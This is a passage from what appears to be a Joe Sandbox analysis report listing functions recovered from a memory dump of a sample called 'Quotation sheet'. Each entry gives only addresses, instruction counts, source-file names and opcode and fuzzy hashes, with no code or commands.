                                                                                                                        Function 094DF1B0 Relevance: .0, Instructions: 27COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 815ced036ca6b55c623f1fec8f2713253389d68faa74c1e5a9c3961238ae2b57
                                                                                                                        • Instruction ID: 46a812c412c2564c234ec6ba9e162e507b84492531a8d6e49fc4af271c73a53e
                                                                                                                        • Opcode Fuzzy Hash: 815ced036ca6b55c623f1fec8f2713253389d68faa74c1e5a9c3961238ae2b57
                                                                                                                        • Instruction Fuzzy Hash: 4AE09238D2A20CDFC750EFB8D04576EBBB9EB49300F2011AAD80AA3344EB305E448BD0
                                                                                                                        Function 094DF419 Relevance: .0, Instructions: 27COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 92444853f2408ef27c38114bbd8dae52a8141d5caecf3f7fe5960e62ae23609b
                                                                                                                        • Instruction ID: d4d51c7993f2abf254d463ff115a6df6b02fad943c6315d97a6b69ddbbe6f698
                                                                                                                        • Opcode Fuzzy Hash: 92444853f2408ef27c38114bbd8dae52a8141d5caecf3f7fe5960e62ae23609b
                                                                                                                        • Instruction Fuzzy Hash: E9F01C75D19208EFCB64DFAAD46579CBBB4EB48304F14C1DAD80893305D7715A06CF81
                                                                                                                        Function 094DD430 Relevance: .0, Instructions: 27COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 607bb9187b0b3958c59f772742a65885302e65ec2baed9bb31735b2e86e634f3
                                                                                                                        • Instruction ID: 8991c5c40140f832959429faf773405959f4ac0c9a4db934950fb37f803b0853
                                                                                                                        • Opcode Fuzzy Hash: 607bb9187b0b3958c59f772742a65885302e65ec2baed9bb31735b2e86e634f3
                                                                                                                        • Instruction Fuzzy Hash: 11F01C34E05208EFCB54DFA8D85579CBBB4FB48300F10C19AD81893751D7319A82DF81
                                                                                                                        Function 094DDF18 Relevance: .0, Instructions: 26COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ec724aeeeabbfaab7b9b2d388b9ca80ec6c49a0f3db8f6cda768e1c6af44488e
                                                                                                                        • Instruction ID: 99b3337dbbda5b7aee2e927856c845ab921dd42d7a2122cff18a094cc3758373
                                                                                                                        • Opcode Fuzzy Hash: ec724aeeeabbfaab7b9b2d388b9ca80ec6c49a0f3db8f6cda768e1c6af44488e
                                                                                                                        • Instruction Fuzzy Hash: 82F01539819208EFCF01DF90D844D99BFBAFB49310F15C199E9081B361D7329A62EB80
                                                                                                                        Function 094DD009 Relevance: .0, Instructions: 26COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ba5161fff735463da1b97ecc65c4e8b7b1af8e5707a69b89b99a4ad5cee57756
                                                                                                                        • Instruction ID: 10cb505bd8f11827808b2c3c63f2c8eab7498990277564d476a9a1acde42b2c5
                                                                                                                        • Opcode Fuzzy Hash: ba5161fff735463da1b97ecc65c4e8b7b1af8e5707a69b89b99a4ad5cee57756
                                                                                                                        • Instruction Fuzzy Hash: 7CF0D478E05148EFDB55DFA8D4516ACBBB1EB89314F1481AAD84893350C7358A42DB40
                                                                                                                        Function 094DC348 Relevance: .0, Instructions: 26COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6fa49f0c66dff7077213cf9963ae3d4be74580e8998201bb318d7f9613a15480
                                                                                                                        • Instruction ID: 4a3b255f70f07e6620db7417227e4f6b34e7c43d121fef7188c70b7809658832
                                                                                                                        • Opcode Fuzzy Hash: 6fa49f0c66dff7077213cf9963ae3d4be74580e8998201bb318d7f9613a15480
                                                                                                                        • Instruction Fuzzy Hash: BBE0DFBA90A108EBDB04CE94C893BADB778EF65349F145599D80893341DBB2DF03C345
                                                                                                                        Function 094DB5D9 Relevance: .0, Instructions: 26COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 09f8464ffe9624ccd00f695b7b79582f74b0b86a71e4407385c140cea9b2abbe
                                                                                                                        • Instruction ID: 7c65143ae4038b4871ed3d64a2b30d00c6b22e25100c75f64a4804848b12dc97
                                                                                                                        • Opcode Fuzzy Hash: 09f8464ffe9624ccd00f695b7b79582f74b0b86a71e4407385c140cea9b2abbe
                                                                                                                        • Instruction Fuzzy Hash: 0EF0F879E46208CFDB44CF55C4A0ADCFBB5FB89300F1280AAD509AB310C731A981CF50
                                                                                                                        Function 094DC4B0 Relevance: .0, Instructions: 26COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 711ac4df0053f9d0ca98c4ee0df413f2ab8305ca5f9c9b852311e409b172e28d
                                                                                                                        • Instruction ID: 7325593f3387dac1bd61832fa1f49a37f5adfa9daf2f26bc091375e65c7b3cdf
                                                                                                                        • Opcode Fuzzy Hash: 711ac4df0053f9d0ca98c4ee0df413f2ab8305ca5f9c9b852311e409b172e28d
                                                                                                                        • Instruction Fuzzy Hash: E0E09A3991B208DBD360DEA4D19477AB7EAE74A305F106295D809A3350DB315E008AD0
                                                                                                                        Function 094DC608 Relevance: .0, Instructions: 26COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 44ed2d61e5bf4f4899893cb12f6669c09af4ddd4e82afc3c30e7c4758cd6c520
                                                                                                                        • Instruction ID: 4d3926dc356f7604f96f329e4fb6281c9da6ac43b36f17f5e4dc677ec61ec250
                                                                                                                        • Opcode Fuzzy Hash: 44ed2d61e5bf4f4899893cb12f6669c09af4ddd4e82afc3c30e7c4758cd6c520
                                                                                                                        • Instruction Fuzzy Hash: 12F0F874D05208AFCB40DF98D49579CBBB4EB48305F24C199D80893341D7319A12CF80
                                                                                                                        Function 094DCAD0 Relevance: .0, Instructions: 25COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: fbe6e8749995cd977949cdc2279b1c061e9f9f9a6b35f9290cc707e133a4356d
                                                                                                                        • Instruction ID: 0ac14367412e842a68eb0739f25c8f5e2012cda6f593414085219dc51b5f3346
                                                                                                                        • Opcode Fuzzy Hash: fbe6e8749995cd977949cdc2279b1c061e9f9f9a6b35f9290cc707e133a4356d
                                                                                                                        • Instruction Fuzzy Hash: 0CF03978D09248EFC705DFA8D8916ACBBB4FB49300F1581EAE88997351D7719E42CB91
                                                                                                                        Function 094D4AF0 Relevance: .0, Instructions: 24COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7c20d90cdc2e179546f1fcfed0fd8465f1f646e1b149492ce4af49dad30e311c
                                                                                                                        • Instruction ID: bfe79db90609cc2d4c03d9271ae9e49752dd5114f24f0ef5961dcce85c9ec3d0
                                                                                                                        • Opcode Fuzzy Hash: 7c20d90cdc2e179546f1fcfed0fd8465f1f646e1b149492ce4af49dad30e311c
                                                                                                                        • Instruction Fuzzy Hash: F3E0C236301E15034E3A290EE8A4A6E728ACBC5526308402BE11AC7BA0CD688842C2A9
                                                                                                                        Function 094DD558 Relevance: .0, Instructions: 24COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4e99adda0bbe13f910141a4883bb3c19bb9666fead83c85f7e2ca7258937da68
                                                                                                                        • Instruction ID: 2824fb00054946900593953f65d4fe09eec8f768ffc5b0754ea0451f3c176c48
                                                                                                                        • Opcode Fuzzy Hash: 4e99adda0bbe13f910141a4883bb3c19bb9666fead83c85f7e2ca7258937da68
                                                                                                                        • Instruction Fuzzy Hash: A1F01278D09248AFCB05CF94C4A0A9CBBB0FB48301F0481AAA80897250C3369A52DB40
                                                                                                                        Function 094DD568 Relevance: .0, Instructions: 24COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: fa9d279b535cd0ff1e1f39ba3e31a3a1453e43afa6bd5e22de1ecea54d3fdfe1
                                                                                                                        • Instruction ID: 7ea08dec5550854bdb69d50621b7367fe6a37f62fb7c4411dc206ddf5665f8c8
                                                                                                                        • Opcode Fuzzy Hash: fa9d279b535cd0ff1e1f39ba3e31a3a1453e43afa6bd5e22de1ecea54d3fdfe1
                                                                                                                        • Instruction Fuzzy Hash: 0BF09278D05208AFCB54DFA8D451A9DBBB5EB48314F10C5AAA81893350D7329A51DF90
                                                                                                                        Function 094D0901 Relevance: .0, Instructions: 23COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5caaf8ccb68cd7c38070527df7f86a2f7086e98c51700ec1813f7eecbe050525
                                                                                                                        • Instruction ID: d1cd621f19879f7da3f7bb1ac74f984a648f936193ced425eb6c13d1ee7ef5fd
                                                                                                                        • Opcode Fuzzy Hash: 5caaf8ccb68cd7c38070527df7f86a2f7086e98c51700ec1813f7eecbe050525
                                                                                                                        • Instruction Fuzzy Hash: A3E0EC353605108FCB089F7DD868BA977E9EF4AB51F4A00AAF605CB371DA65EC01CB94
                                                                                                                        Function 094DE818 Relevance: .0, Instructions: 23COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: eaeb2392d01d67b7da9356d776e34fb0605ab65b75be99df3f9676757b35d53c
                                                                                                                        • Instruction ID: 5df65edacc3e3efeab7a693ba5b8af58368ca9462a5ca073f274ae9c7b57445f
                                                                                                                        • Opcode Fuzzy Hash: eaeb2392d01d67b7da9356d776e34fb0605ab65b75be99df3f9676757b35d53c
                                                                                                                        • Instruction Fuzzy Hash: 2EE0C978D05208EFCB44DFA8D44169DBBF4EB48310F10C1AAE80897340D7369A51DF90
                                                                                                                        Function 094D48F8 Relevance: .0, Instructions: 23COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c2e1268d2e57a1d9db0a95bb9bd69d7f9dd112ac321f653b7f3c87a66e711265
                                                                                                                        • Instruction ID: 2bc8d4e6414a70505a4eb05dc005de9d62cb7aceba51b696074d46543e960017
                                                                                                                        • Opcode Fuzzy Hash: c2e1268d2e57a1d9db0a95bb9bd69d7f9dd112ac321f653b7f3c87a66e711265
                                                                                                                        • Instruction Fuzzy Hash: 59E0CD317056105FD614AA7BDC54757B7FAFBC4600B09C22DD44D87718DA32A84147D0
                                                                                                                        Function 094D1BF0 Relevance: .0, Instructions: 23COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1777123384efeba0687a9ddbb62bb942903b663fd72782304322338ee02cdcdf
                                                                                                                        • Instruction ID: 763f14a8378b9aac3b5f4b77ae00542e15cda0488990971fbfd573a146b1f138
                                                                                                                        • Opcode Fuzzy Hash: 1777123384efeba0687a9ddbb62bb942903b663fd72782304322338ee02cdcdf
                                                                                                                        • Instruction Fuzzy Hash: 54E02634643608DBCB20D77CA4903BAB7B6E78A350F40542AC98177B02CB380C43C780
                                                                                                                        Function 094DD018 Relevance: .0, Instructions: 23COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: eaeb2392d01d67b7da9356d776e34fb0605ab65b75be99df3f9676757b35d53c
                                                                                                                        • Instruction ID: 11e0a1924e15e2cedc93abb84eaeab5c40f476474ca580e8c4142f61f014c446
                                                                                                                        • Opcode Fuzzy Hash: eaeb2392d01d67b7da9356d776e34fb0605ab65b75be99df3f9676757b35d53c
                                                                                                                        • Instruction Fuzzy Hash: 98E0C978D05208EFCB54DFA8D44169DBBF4EB88314F10C1AAD80893340D7319A52DF80
                                                                                                                        Function 094DF248 Relevance: .0, Instructions: 23COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: eb194eb5b93826800b6235d08449385b9e1c908d87ff14326ba7c811f7755a61
                                                                                                                        • Instruction ID: 94f05365e406f01246c0cb3841e56a68a811ac0e9ebbcba3dd267366c63d3726
                                                                                                                        • Opcode Fuzzy Hash: eb194eb5b93826800b6235d08449385b9e1c908d87ff14326ba7c811f7755a61
                                                                                                                        • Instruction Fuzzy Hash: D1E01A38919108EBDB14DF94E8567ACBBB8BB46304F1091D9DC0513354CB325E46DB80
                                                                                                                        Function 094DA931 Relevance: .0, Instructions: 22COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3de2e167494f8ded294ab9db2cc3aa517015db6a2c2bd3cf505fcba36f7c7593
                                                                                                                        • Instruction ID: c94bcfcaa37b320b2f373b08acc5a7b848a1d11963554168692ab584d8dd5f66
                                                                                                                        • Opcode Fuzzy Hash: 3de2e167494f8ded294ab9db2cc3aa517015db6a2c2bd3cf505fcba36f7c7593
                                                                                                                        • Instruction Fuzzy Hash: DDE026B4809309CFDB119FA0881929D3F70E70A301F0108D7E404072A0DF310E04CB40
                                                                                                                        Function 094DEFC8 Relevance: .0, Instructions: 22COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 458ceb470096d51000870044afc4bf403563098a03bc72f0f0214e6b5c86757a
                                                                                                                        • Instruction ID: 277fae5578b496b1d0ec9e209f7e198f3e868325f9dae7eb6046b1446d714f96
                                                                                                                        • Opcode Fuzzy Hash: 458ceb470096d51000870044afc4bf403563098a03bc72f0f0214e6b5c86757a
                                                                                                                        • Instruction Fuzzy Hash: 2CE0E578E05208EFCB44DFA8D451AADBBF4EB48300F10C1AAE80897340D731AE42CF80
                                                                                                                        Function 094D1399 Relevance: .0, Instructions: 22COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d1919eef1e5643da1195dae09c0d5cafcb202a42a26a7e4bd1e17e7cdb8e76ef
                                                                                                                        • Instruction ID: c9f5d8dbd3ec8a99bf02c70d95c13aea64fb746f42dad2ad722ff2c09ef10342
                                                                                                                        • Opcode Fuzzy Hash: d1919eef1e5643da1195dae09c0d5cafcb202a42a26a7e4bd1e17e7cdb8e76ef
                                                                                                                        • Instruction Fuzzy Hash: 02E0C23F10D1105BE7609B42FC52BCA3361FF88301F198507E880C7248C139A5C28760
                                                                                                                        Function 094DD440 Relevance: .0, Instructions: 22COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 458ceb470096d51000870044afc4bf403563098a03bc72f0f0214e6b5c86757a
                                                                                                                        • Instruction ID: 8aae3e95b9accdf6c4854ec7c80a37de3845b85f66fb72258398a3a93246d78c
                                                                                                                        • Opcode Fuzzy Hash: 458ceb470096d51000870044afc4bf403563098a03bc72f0f0214e6b5c86757a
                                                                                                                        • Instruction Fuzzy Hash: DDE0E578E05208EFCB94DFA8D4856ACBBF4EB48300F10C1AAD81893741D731AE46DF81
                                                                                                                        Function 094DF428 Relevance: .0, Instructions: 22COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 458ceb470096d51000870044afc4bf403563098a03bc72f0f0214e6b5c86757a
                                                                                                                        • Instruction ID: e46f8bbbd97f43c19ec0a31dbd9b490cd8924e6a2367a99306d244398c63e6da
                                                                                                                        • Opcode Fuzzy Hash: 458ceb470096d51000870044afc4bf403563098a03bc72f0f0214e6b5c86757a
                                                                                                                        • Instruction Fuzzy Hash: E3E0C278E15208AFCB64DFA9D4516ACBBF4EB48204F10C1AAD809A3340D7719A46CB81
                                                                                                                        Function 094DC618 Relevance: .0, Instructions: 22COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 458ceb470096d51000870044afc4bf403563098a03bc72f0f0214e6b5c86757a
                                                                                                                        • Instruction ID: 53b46f4ea54ba3604a167ec51ffdd9d87434dbd0744e458fc174468d583a4e1c
                                                                                                                        • Opcode Fuzzy Hash: 458ceb470096d51000870044afc4bf403563098a03bc72f0f0214e6b5c86757a
                                                                                                                        • Instruction Fuzzy Hash: 9EE0E578E05208EFCB44DFA8D5916ACBBF4EB48304F14C1AAD84893341D7329E42DF80
                                                                                                                        Function 094D0DA4 Relevance: .0, Instructions: 21COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 08d782dd687b20eb42c208f70b8ab71a9018585138fc140f0d43e1eb71bff9d1
                                                                                                                        • Instruction ID: 2ab6ffb8c119b80a9541165d43f092a257092ca53633eee06f3f5484c3f94645
                                                                                                                        • Opcode Fuzzy Hash: 08d782dd687b20eb42c208f70b8ab71a9018585138fc140f0d43e1eb71bff9d1
                                                                                                                        • Instruction Fuzzy Hash: 7ED05E3B69E1204AE664D915EC927DE3351FFC8302F298D5BE881D7284C97AD9868251
                                                                                                                        Function 094DA940 Relevance: .0, Instructions: 20COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: df4e5684dd85bd441a9af9b686df83c2d3c829935f1436a112ed817844286613
                                                                                                                        • Instruction ID: 429a7c0e08a164f7c3fa38651c86f2f371971f003fc3766b9d5ed7d0d1a0570c
                                                                                                                        • Opcode Fuzzy Hash: df4e5684dd85bd441a9af9b686df83c2d3c829935f1436a112ed817844286613
                                                                                                                        • Instruction Fuzzy Hash: 31E0EC7581A208EFCB00EFB4941969E7FB9EB09201F0159E6E50993650EF714A009791
                                                                                                                        Function 094D5BB9 Relevance: .0, Instructions: 20COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c0671091b3c113442caf6cc47bc2206fe21d11f1804d115c6287566a186a6a16
                                                                                                                        • Instruction ID: e724f3f519437a07bdcf66d28dca46a5c3c4d692d45ba6ee2b5f861d90026cd0
                                                                                                                        • Opcode Fuzzy Hash: c0671091b3c113442caf6cc47bc2206fe21d11f1804d115c6287566a186a6a16
                                                                                                                        • Instruction Fuzzy Hash: 97E0E27A108208FBDB021FC2EC6AA9A3F39FB18740F459406FA154616DC777D121EBA1
                                                                                                                        Function 094DCAE0 Relevance: .0, Instructions: 20COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
